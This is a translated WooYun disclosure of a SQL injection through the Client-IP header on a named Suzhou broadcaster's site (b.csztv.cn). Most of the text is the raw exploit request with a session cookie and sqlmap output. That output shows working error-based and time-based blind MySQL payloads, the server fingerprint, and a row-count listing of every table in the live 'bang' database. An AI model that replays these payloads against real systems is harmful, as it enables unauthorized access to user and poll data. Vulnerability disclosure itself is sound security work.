Vulnerability summary

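Bug ID: wooyun-2015-0159639

Title: Client-IP SQL injection vulnerability on a 苏州广电网 site

Vendor: csztv.cn

Author: 深度安全实验室

Submitted: 2015-12-09 15:17

Fix time: 2015-12-14 15:18

Public disclosure: 2015-12-14 15:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]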


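Vulnerability details

Disclosure status:

2015-12-09: Details sent to the vendor; awaiting vendor handling
2015-12-14: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description: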

GET /px/pollOk/21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: *
Cookie: ci_session=0PTBypVyreZMiVM%2BSl1EqGS5VxaVrY2YuuUQNlnd9Gia8PNb7LCZE%2BKA9HZi4I48DGa0xcMc5HSK%2BAQhUf3022rwCzRQGMv1L2%2BPuzNaD6mUJLOJznkRGD4RTcXkhulRt1oCUqhhuEAx39N8w3g%2BNm3plwQ2AAZJs%2BUGLbQY8wcn49RgXINMzT3DuruRfhAkqXrrd%2F8w%2B0%2B%2BlApy2WIy5wv55PoY39r6RM1oCQg0Xi2NFiUwynb5c3FxL5YPyrVih3Id%2FgTAEKyKF3B9X0vng%2FZDWQ7QuUzptSBLRidWrZDcRD1R1y09Fr00%2Fh%2BbwnLyIJqCZlmiQAEE4QY7AskI0g%3D%3D
Host: b.csztv.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Client-IP #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(9211=9211,1))),0x716a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FWRl'='FWRl
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))WjIN) AND 'caKC'='caKC
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: bang
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| bang_poll_info | 1962678 |
| bang_user_action | 289342 |
| bang_smsinfo_back | 210640 |
| bang_hostip | 144757 |
| bang_capta | 121454 |
| test_test | 69865 |
| att_log_his | 56622 |
| bang_user | 47830 |
| bang_sessions | 38756 |
| bang_page_result | 30360 |
| att_usertask | 26403 |
| att_task | 26361 |
| bang_poll_infot | 18876 |
| wy_vote | 16897 |
| wy_capta | 16492 |
| att_daka_his | 12639 |
| bang_phone | 7299 |
| bang_page_option | 6362 |
| att_daka_detail_his | 5782 |
| bang_phone_tamp | 5145 |
| bang_option_his | 4804 |
| bang_rank_news | 3432 |
| bang_page_option_bak | 3357 |
| bang_page_option_old | 3037 |
| bang_news | 1347 |
| bang_page_title | 1156 |
| bang_candidate | 918 |
| intorder | 405 |
| bang_tjinfo | 309 |
| qauserinfo | 279 |
| host_news | 237 |
| host13_news | 186 |
| bang_sign | 182 |
| bang_survey | 154 |
| contable | 135 |
| torder | 135 |
| adcenter | 126 |
| trade | 89 |
| bang_poster | 77 |
| att_leave | 39 |
| bang_poll | 34 |
| att_members | 17 |
| bang_changelog | 10 |
| class | 8 |
| yd_members | 8 |
| poster | 7 |
| range | 7 |
| bang_rank_trade | 6 |
| bang_tjtype | 6 |
| host_image | 6 |
| bang_action_prize | 5 |
| att_train | 2 |
| bang_event | 2 |
| userinfo | 2 |
| att_train_user | 1 |
| wy_action | 1 |
+----------------------+---------+

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source 深度安全实验室@乌云


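Vulnerability response

Vendor response:

Severity: No impact; ignored by the vendor

Ignored at: 2015-12-14 15:18

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet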